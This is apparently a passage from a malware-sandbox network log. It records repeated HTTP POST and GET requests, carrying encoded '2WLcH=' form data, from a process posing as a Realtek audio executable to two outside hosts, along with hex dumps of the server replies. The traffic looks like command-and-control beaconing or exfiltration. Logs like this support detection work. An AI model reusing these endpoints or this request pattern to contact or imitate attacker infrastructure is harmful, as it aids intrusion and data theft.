                                                                                Nov 25, 2024 11:58:40.408195019 CET190INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56
                                                                                Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_nliGpZw9a+vIqQk4n24dr
                                                                                Nov 25, 2024 11:58:40.408293962 CET1220INData Raw: 49 52 53 66 6e 7a 30 6a 70 45 57 6b 73 67 56 79 4c 79 49 6a 7a 47 6f 70 64 51 35 56 56 6c 46 7a 6a 6a 56 6a 76 6a 46 69 6c 56 61 2f 4f 79 42 79 4a 6d 45 39 6a 69 54 4c 62 46 46 6c 42 6d 4e 41 67 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63
                                                                                Data Ascii: IRSfnz0jpEWksgVyLyIjzGopdQ5VVlFzjjVjvjFilVa/OyByJmE9jiTLbFFlBmNAg=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.614genetics.online/px.js?ch=1"></script><script type="text/javascript
                                                                                Nov 25, 2024 11:58:40.408304930 CET1220INData Raw: 20 20 2f 2a 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0d 0a 20 20 20 20 20 20 20 20 7d 2a 2f 0d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e
                                                                                Data Ascii: /*body { overflow:hidden; }*/ </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following M


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                18192.168.11.20497598.210.46.21807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:58:47.291840076 CET724OUTPOST /r45a/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.prhmcjdz.tokyo
                                                                                Origin: http://www.prhmcjdz.tokyo
                                                                                Referer: http://www.prhmcjdz.tokyo/r45a/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 59 4b 54 36 6f 2b 6f 6c 59 66 46 77 54 4d 6d 71 4e 5a 62 75 73 51 78 38 5a 61 41 54 6e 6b 4f 69 4d 7a 34 2f 51 77 32 31 6e 39 70 61 34 46 6b 70 53 68 32 4f 41 47 34 32 75 4c 37 2b 59 76 63 33 43 78 6b 2f 36 7a 2f 6b 2b 51 78 54 6e 2f 4e 71 55 7a 38 34 73 41 69 51 4a 66 6d 42 66 78 76 4e 57 35 43 6d 62 74 6a 52 38 54 75 46 72 51 36 63 6b 42 64 74 51 64 31 4c 68 72 54 61 37 48 76 65 39 57 30 33 6b 6e 47 53 74 56 65 31 4b 73 41 2b 45 47 6b 55 74 4b 56 6b 38 79 44 57 59 46 4d 50 69 6c 2f 65 6f 75 35 6a 36 49 6a 45 43 6e 42 35 6a 73 69 59 68 4a 70 45 53 36 73 69 6b 6b 32 46 42 77 3d 3d
                                                                                Data Ascii: 2WLcH=YKT6o+olYfFwTMmqNZbusQx8ZaATnkOiMz4/Qw21n9pa4FkpSh2OAG42uL7+Yvc3Cxk/6z/k+QxTn/NqUz84sAiQJfmBfxvNW5CmbtjR8TuFrQ6ckBdtQd1LhrTa7Hve9W03knGStVe1KsA+EGkUtKVk8yDWYFMPil/eou5j6IjECnB5jsiYhJpES6sikk2FBw==
                                                                                Nov 25, 2024 11:58:47.583050966 CET503INHTTP/1.1 200
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 10:58:47 GMT
                                                                                Content-Type: application/json;charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Origin
                                                                                Vary: Access-Control-Request-Method
                                                                                Vary: Access-Control-Request-Headers
                                                                                Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                                Access-Control-Allow-Credentials: true
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 72 34 35 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a
                                                                                Data Ascii: 54{"msg":"/r45a/","code":401}
                                                                                Nov 25, 2024 11:58:47.583059072 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                19192.168.11.20497608.210.46.21807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:58:50.133686066 CET744OUTPOST /r45a/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.prhmcjdz.tokyo
                                                                                Origin: http://www.prhmcjdz.tokyo
                                                                                Referer: http://www.prhmcjdz.tokyo/r45a/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 59 4b 54 36 6f 2b 6f 6c 59 66 46 77 56 74 57 71 43 59 62 75 38 41 78 37 63 61 41 54 70 45 4f 6d 4d 7a 30 2f 51 79 62 34 6e 50 64 61 34 6b 30 70 54 67 32 4f 44 47 34 32 6d 72 37 37 48 2f 63 67 43 78 5a 43 36 78 37 6b 2b 51 6c 54 6e 2b 39 71 55 69 38 37 74 51 69 4f 42 2f 6d 50 43 68 76 4e 57 35 43 6d 62 72 50 37 38 53 47 46 71 68 71 63 6c 6b 70 71 54 64 31 45 69 72 54 61 2f 48 76 53 39 57 30 46 6b 6d 71 73 74 58 57 31 4b 70 73 2b 46 58 6b 54 6d 4b 56 75 6b 53 43 46 66 47 64 47 6c 33 7a 77 70 70 68 76 37 59 33 35 4b 52 4d 6a 2b 65 57 38 69 61 31 32 57 4b 56 4b 6d 6d 33 65 63 79 6d 55 6a 64 78 64 75 63 7a 7a 41 2f 51 61 47 53 50 50 59 70 6b 3d
                                                                                Data Ascii: 2WLcH=YKT6o+olYfFwVtWqCYbu8Ax7caATpEOmMz0/Qyb4nPda4k0pTg2ODG42mr77H/cgCxZC6x7k+QlTn+9qUi87tQiOB/mPChvNW5CmbrP78SGFqhqclkpqTd1EirTa/HvS9W0FkmqstXW1Kps+FXkTmKVukSCFfGdGl3zwpphv7Y35KRMj+eW8ia12WKVKmm3ecymUjdxduczzA/QaGSPPYpk=
                                                                                Nov 25, 2024 11:58:50.451659918 CET503INHTTP/1.1 200
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 10:58:50 GMT
                                                                                Content-Type: application/json;charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Origin
                                                                                Vary: Access-Control-Request-Method
                                                                                Vary: Access-Control-Request-Headers
                                                                                Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                                Access-Control-Allow-Credentials: true
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 72 34 35 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a
                                                                                Data Ascii: 54{"msg":"/r45a/","code":401}
                                                                                Nov 25, 2024 11:58:50.451673985 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                20192.168.11.20497618.210.46.21807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:58:52.975769043 CET2578OUTPOST /r45a/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.prhmcjdz.tokyo
                                                                                Origin: http://www.prhmcjdz.tokyo
                                                                                Referer: http://www.prhmcjdz.tokyo/r45a/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 59 4b 54 36 6f 2b 6f 6c 59 66 46 77 56 74 57 71 43 59 62 75 38 41 78 37 63 61 41 54 70 45 4f 6d 4d 7a 30 2f 51 79 62 34 6e 50 46 61 37 57 73 70 53 48 71 4f 43 47 34 32 73 4c 37 36 48 2f 63 39 43 78 41 46 36 78 6e 61 2b 53 64 54 6e 59 68 71 44 67 59 37 6d 51 69 4f 65 50 6d 43 66 78 76 55 57 35 79 69 62 74 76 37 38 53 47 46 71 69 69 63 73 52 64 71 66 39 31 4c 68 72 54 65 37 48 76 32 39 53 59 56 6b 6d 76 5a 73 6a 61 31 4b 4a 38 2b 44 6c 4d 54 76 4b 56 67 78 53 44 43 66 47 52 46 6c 30 48 43 70 74 70 57 37 5a 76 35 4a 30 67 38 73 39 4b 32 38 38 68 30 64 37 6f 33 68 33 50 62 61 52 36 41 73 64 74 76 79 71 50 6f 41 4f 38 70 56 68 54 69 48 65 61 6b 5a 76 77 69 41 74 46 67 75 50 35 4c 4d 39 6e 41 63 70 63 2f 31 74 58 77 77 47 4b 58 6f 73 66 4b 72 67 59 70 77 6a 31 7a 35 67 48 39 52 53 70 6e 56 64 77 66 4b 4a 33 4c 34 4b 34 6b 64 4a 65 59 76 2b 39 72 30 50 37 33 76 70 34 4b 77 4a 2f 64 76 77 4b 2b 72 59 75 72 6d 38 31 6e 77 2b 47 37 4a 54 42 4a 4b 41 44 63 72 6a 6d 55 57 4a 61 32 50 58 68 58 [TRUNCATED]
                                                                                Data Ascii: 2WLcH=YKT6o+olYfFwVtWqCYbu8Ax7caATpEOmMz0/Qyb4nPFa7WspSHqOCG42sL76H/c9CxAF6xna+SdTnYhqDgY7mQiOePmCfxvUW5yibtv78SGFqiicsRdqf91LhrTe7Hv29SYVkmvZsja1KJ8+DlMTvKVgxSDCfGRFl0HCptpW7Zv5J0g8s9K288h0d7o3h3PbaR6AsdtvyqPoAO8pVhTiHeakZvwiAtFguP5LM9nAcpc/1tXwwGKXosfKrgYpwj1z5gH9RSpnVdwfKJ3L4K4kdJeYv+9r0P73vp4KwJ/dvwK+rYurm81nw+G7JTBJKADcrjmUWJa2PXhXJRtrjRk0o7k5XP3afiak9PoKfV7F2AtWLDYUa7/k/RsX+9wxYm1h+RD33H7Y0b/VM665klxqqLVbOUVAQ9MiMsbXsYz3gQxKy+VjUBuplzK2RcsR52zOUvxXLl04K89gmuVZ3QGfw1Xtn+4bjI/KAX4I5O/V2wCIO1kjl2AKP+Hzm2SisW03quxKszamhFdAItwcH2XT9rrOCQYSgbnjIMXM91mKnIBCyhWS3KyagwGZTzE9BB3v80WqGCEeCNw6VXZSxPas24wg5mg7PjVOvBAE+U/gWFnvn/j1816eFfYTGaYVv7QreEAmWT6OC9kdT+UQOLkUKhNG0gamus6I6Ih2KfWyN6y3hDjCf5012SgBnmdJoYVUnlFcVCfKTumtv0zQN6Ms+yzF9sR2N+O1vlXowRdXQ8xPlVIDLqU4JEv69g+iipeEUzpWkH1qxr+QpM2x8DdiWiH0IUe7ajGsxqMzsg+wMspWsA22l5DU/QERzd1SN2DIrNww8Tw/VRtnPu2XxXNYJJe73ThTkGM2yuUq7SLeyOvuDgzBiG2NqPOpPaI4++qb0/z+aLYm6oAWg1UgzRwQkyW0wKaHHk0p6J+W8/rFdts0yLfTpfLc8F/gUaoUWQWDTgpHQcXyD/Dt7dHPEDcEG20/dqeqfAsRM5Dv1BXCNFkRbm [TRUNCATED]
                                                                                Nov 25, 2024 11:58:52.975841045 CET5315OUTData Raw: 7a 32 36 4b 6c 7a 4d 70 4b 54 6b 78 6c 55 4d 4c 52 37 70 51 4d 49 6f 74 38 76 6f 79 63 45 4f 56 2b 52 76 64 65 65 53 57 4d 36 68 67 33 71 7a 6c 41 34 32 50 75 4d 2b 31 53 6b 66 71 59 48 52 79 56 34 6f 50 4c 55 36 2b 72 39 44 44 77 36 63 72 50 4a
                                                                                Data Ascii: z26KlzMpKTkxlUMLR7pQMIot8voycEOV+RvdeeSWM6hg3qzlA42PuM+1SkfqYHRyV4oPLU6+r9DDw6crPJ996Ty83zVR9fC2/Cr/AVYgfkQlj2lYbOLxpcEJuENejVu5bITV/2VakiBxdDjZmY3J5WbdCB5Ul19qSRIKtUPv+R6Jwi6D5sAgqDRytx1TkONTjyS9iek0mtVKpJZwykETnSV3xu5YkFH1s+7Yo/JzztX7nV/txl0
                                                                                Nov 25, 2024 11:58:53.292707920 CET503INHTTP/1.1 200
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 10:58:53 GMT
                                                                                Content-Type: application/json;charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Origin
                                                                                Vary: Access-Control-Request-Method
                                                                                Vary: Access-Control-Request-Headers
                                                                                Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                                Access-Control-Allow-Credentials: true
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 72 34 35 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a
                                                                                Data Ascii: 54{"msg":"/r45a/","code":401}
                                                                                Nov 25, 2024 11:58:53.292756081 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                21192.168.11.20497628.210.46.21807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:58:55.801866055 CET456OUTGET /r45a/?2WLcH=VI7arJMCR+F5a8GIF7LvlydvT54UqGGGJzEBbUfyg8Id9FJQQiiIP0Zhv5D8EvYCLyQ71yr7yDtQnd5dLG0ZmCq3JeeWBBH/ELG6XL/ZgjHL6FvdoncqEJc=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.prhmcjdz.tokyo
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 11:58:56.102536917 CET427INHTTP/1.1 200
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 10:58:55 GMT
                                                                                Content-Type: application/json;charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Origin
                                                                                Vary: Access-Control-Request-Method
                                                                                Vary: Access-Control-Request-Headers
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                X-Cache: MISS
                                                                                Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 72 34 35 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 54{"msg":"/r45a/","code":401}0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                22192.168.11.2049763154.88.22.105807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:59:01.584850073 CET712OUTPOST /sp9i/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.cg19g5.pro
                                                                                Origin: http://www.cg19g5.pro
                                                                                Referer: http://www.cg19g5.pro/sp9i/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 79 77 77 65 34 54 68 70 4a 59 70 50 77 49 53 66 4d 78 49 69 4e 52 4f 6d 5a 34 34 39 55 4a 2b 38 4f 43 78 59 4e 57 2f 68 39 76 6b 4a 5a 5a 36 72 6e 6e 7a 49 42 43 37 69 4d 37 41 2f 6d 59 48 4f 75 35 57 46 63 41 50 68 44 41 79 71 39 44 6f 2b 4f 65 47 5a 6f 7a 37 73 4a 74 4e 75 79 30 4f 37 65 34 7a 52 7a 33 56 79 6b 50 42 6e 6b 61 5a 34 41 4a 4a 41 7a 2f 43 74 32 6f 76 33 44 50 76 66 37 57 48 6b 79 4e 4e 46 65 4d 58 4e 63 69 70 62 57 47 56 2f 4a 56 4d 4c 50 47 70 32 48 63 50 74 66 42 6d 4d 73 75 63 69 70 6b 5a 75 55 75 73 69 37 74 69 4d 78 69 56 75 52 72 47 36 57 61 34 59 6c 67 3d 3d
                                                                                Data Ascii: 2WLcH=ywwe4ThpJYpPwISfMxIiNROmZ449UJ+8OCxYNW/h9vkJZZ6rnnzIBC7iM7A/mYHOu5WFcAPhDAyq9Do+OeGZoz7sJtNuy0O7e4zRz3VykPBnkaZ4AJJAz/Ct2ov3DPvf7WHkyNNFeMXNcipbWGV/JVMLPGp2HcPtfBmMsucipkZuUusi7tiMxiVuRrG6Wa4Ylg==
                                                                                Nov 25, 2024 11:59:01.910096884 CET364INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 10:59:01 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 19 7e 21 5e 19 3e b9 7e 79 be 21 81 55 49 99 a6 e5 c9 b9 16 66 7e 59 91 26 fe 81 b6 b6 ea 9a 36 fa 50 13 01 2b 3f d7 f6 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 67)N.,(ON,VPV/Ji%IAf>~!^>~y!UIf~Y&6P+?Z0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                23192.168.11.2049764154.88.22.105807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:59:04.411242962 CET732OUTPOST /sp9i/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.cg19g5.pro
                                                                                Origin: http://www.cg19g5.pro
                                                                                Referer: http://www.cg19g5.pro/sp9i/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 79 77 77 65 34 54 68 70 4a 59 70 50 79 72 61 66 41 33 41 69 4c 78 4f 6c 63 34 34 39 65 70 2f 55 4f 43 4e 59 4e 55 54 4c 39 39 41 4a 5a 35 4b 72 6d 6d 7a 49 49 53 37 69 48 62 41 36 69 59 48 56 75 35 53 72 63 45 48 68 44 45 61 71 39 48 6b 2b 4f 76 47 61 71 6a 37 75 63 64 4e 73 32 30 4f 37 65 34 7a 52 7a 33 52 55 6b 50 5a 6e 6b 71 4a 34 41 6f 4a 48 37 66 43 71 2f 49 76 33 48 50 76 62 37 57 48 6a 79 4d 51 4e 65 4f 76 4e 63 6a 5a 62 57 53 42 77 41 56 4e 68 53 57 6f 61 55 4e 6d 33 58 77 4b 6a 67 73 49 48 6f 30 56 31 52 34 68 34 6d 66 57 6f 79 78 4a 63 56 62 2f 53 55 59 35 44 34 70 63 74 32 7a 71 2b 30 53 34 69 71 77 59 7a 36 72 54 54 51 56 45 3d
                                                                                Data Ascii: 2WLcH=ywwe4ThpJYpPyrafA3AiLxOlc449ep/UOCNYNUTL99AJZ5KrmmzIIS7iHbA6iYHVu5SrcEHhDEaq9Hk+OvGaqj7ucdNs20O7e4zRz3RUkPZnkqJ4AoJH7fCq/Iv3HPvb7WHjyMQNeOvNcjZbWSBwAVNhSWoaUNm3XwKjgsIHo0V1R4h4mfWoyxJcVb/SUY5D4pct2zq+0S4iqwYz6rTTQVE=
                                                                                Nov 25, 2024 11:59:04.730123043 CET364INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 10:59:04 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 19 7e 21 5e 19 3e b9 7e 79 be 21 81 55 49 99 a6 e5 c9 b9 16 66 7e 59 91 26 fe 81 b6 b6 ea 9a 36 fa 50 13 01 2b 3f d7 f6 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 67)N.,(ON,VPV/Ji%IAf>~!^>~y!UIf~Y&6P+?Z0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                24192.168.11.2049765154.88.22.105807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:59:07.240382910 CET2578OUTPOST /sp9i/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.cg19g5.pro
                                                                                Origin: http://www.cg19g5.pro
                                                                                Referer: http://www.cg19g5.pro/sp9i/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 79 77 77 65 34 54 68 70 4a 59 70 50 79 72 61 66 41 33 41 69 4c 78 4f 6c 63 34 34 39 65 70 2f 55 4f 43 4e 59 4e 55 54 4c 39 39 49 4a 59 4b 43 72 6e 46 4c 49 53 53 37 69 4b 37 41 37 69 59 47 48 75 34 32 76 63 45 44 66 44 43 65 71 38 6b 73 2b 47 37 71 61 6a 6a 37 75 65 64 4e 70 79 30 50 35 65 34 69 61 7a 33 42 55 6b 50 5a 6e 6b 73 46 34 47 35 4a 48 32 2f 43 74 32 6f 76 46 44 50 76 2f 37 57 76 56 79 4d 6c 76 66 2f 50 4e 63 44 4a 62 52 6b 39 77 43 31 4d 48 52 57 6f 43 55 4e 37 70 58 77 57 76 67 74 73 39 6f 31 4e 31 64 4d 64 6c 7a 64 47 2f 75 43 78 55 55 61 2f 5a 56 4a 64 48 2f 72 38 45 32 79 79 6b 7a 6d 6b 68 74 7a 74 6e 67 34 54 4a 46 41 6e 51 33 4a 31 59 66 2f 32 62 67 2b 70 44 43 55 6a 43 30 76 30 50 69 52 4f 6d 73 52 36 36 48 75 52 41 33 4d 78 37 41 50 73 32 42 74 65 67 44 59 6c 38 65 76 37 59 34 56 67 78 71 69 5a 52 6e 56 4b 34 45 57 76 51 78 79 43 33 58 50 79 57 61 58 42 6e 51 56 4c 42 58 75 74 6b 75 44 78 6e 73 66 57 67 57 4e 52 75 53 75 53 42 2f 43 54 58 70 61 44 69 79 4c 2b 37 [TRUNCATED]
                                                                                Data Ascii: 2WLcH=ywwe4ThpJYpPyrafA3AiLxOlc449ep/UOCNYNUTL99IJYKCrnFLISS7iK7A7iYGHu42vcEDfDCeq8ks+G7qajj7uedNpy0P5e4iaz3BUkPZnksF4G5JH2/Ct2ovFDPv/7WvVyMlvf/PNcDJbRk9wC1MHRWoCUN7pXwWvgts9o1N1dMdlzdG/uCxUUa/ZVJdH/r8E2yykzmkhtztng4TJFAnQ3J1Yf/2bg+pDCUjC0v0PiROmsR66HuRA3Mx7APs2BtegDYl8ev7Y4VgxqiZRnVK4EWvQxyC3XPyWaXBnQVLBXutkuDxnsfWgWNRuSuSB/CTXpaDiyL+7YUnMCXa208X64r4hWkygjLjwAtcourQ/XqjfjaYfKYjWFcIgt9KLtZ+glWEShQNb6VEBCSb+RjidlbMLWp1zNkbug/X3yR4pVJ/zuV24pQzX/I+IMM2/Cci1YSgMwaPYPl0BxM4TG2y+tDp1KrFOx0yElGQWao8RF9DkKHSUrEIZRAMhe28vRzjkZmD2ctiVq2zOB3b64q3vXjDXf9HCuPeUuohLP0UpLqNPziLl8MxuTHfX+mZMewExvW7BLnfx5dXxW1Ze1oQFnRuaGMC55sFoVWLBLY1FSli/ikYcG+OIR0ZoYtFkZ8jDMJ3Jn/WnLetgzSXZIfTcuclu+Hng4Dpw304VVgQMk4owoY0ysy4MWy4lc1bIUieTTm6YyzozsxhVl+Q/Rh6Lc+9yPe2j/VUiRrswbnir4QZmjzK+VxeWhvJEMhdTmgmkr4UTRgDSeHsbyV81+yeV3Wii8GZVZHxulz+odMqmqt4inCgsVhbPrHTyKsvBUzWtRS93EPei58hvZa9KLTY2sX8zoRX/EcpegbyesuJFWjN2tdOgdHaupkuU8gjOYSUwjoN1ITYaMUpusDelkKClzJmqjbuPPyF+BwiGIRkrf7rsEazYQINwZYBODqdIJ1W3QN3OBhZpqBWgQBqfCCfD0NSEv56T2iaZpJpQu7oOnI [TRUNCATED]
